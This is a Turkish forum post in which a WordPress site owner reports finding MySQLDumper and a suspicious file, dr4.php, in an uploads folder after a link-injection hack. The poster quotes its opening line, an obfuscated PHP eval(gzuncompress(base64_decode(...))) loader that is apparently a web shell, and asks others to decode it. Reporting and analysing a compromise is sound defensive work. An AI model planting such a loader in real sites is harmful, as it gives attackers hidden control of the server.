Merhaba arkadaşlar bugün hostumun yedeğini alırken upload klasorunda 05 nolu resim klasorunun içinde

MySQLDumper1.24.4 klasoru ve

dr4.php adında bir dosya atılmış.

dosyanın içeriği ise

<?php /*  Th3-0uTl4wS */
eval("?>".gzuncompress(base64_decode("eJzsuumS49iVJvi/zfodvKI0HammlNg3KVNqgARAEMRC7GDZWBr2fd9RXe8+oHtELlKmWjUzNjM/hrRwOnHPPfs59zv
bu şekilde başlıyor.


Dosyaların tarihine baktığımda 29.09.2012 olarak gösteriyor.

Ben 16.10.2012 tarihinde sitemde hacklink olduğunu farketmiştim daha sonra wpyi güncellemiştim link kalmıştı.

Siteme eklenen link ise









Th3-0uTl4wS araştırdğımda bir çok hack ile ilgili sonuçlar çıkıyor. Bu linki bu dosyaları atan kişi yapmış olabilirmi ayrıca MySQLDumper1 ile sadece dosyaları ve dbyimi çekmişlerdir.

wp-content/uploads/2012/05 izinleri 755 olarak ayarlı.

Son olarak dr4.php dosyasını çözebilecek arkadaşlar varmı acaba belki içinden birşeyler çıkar.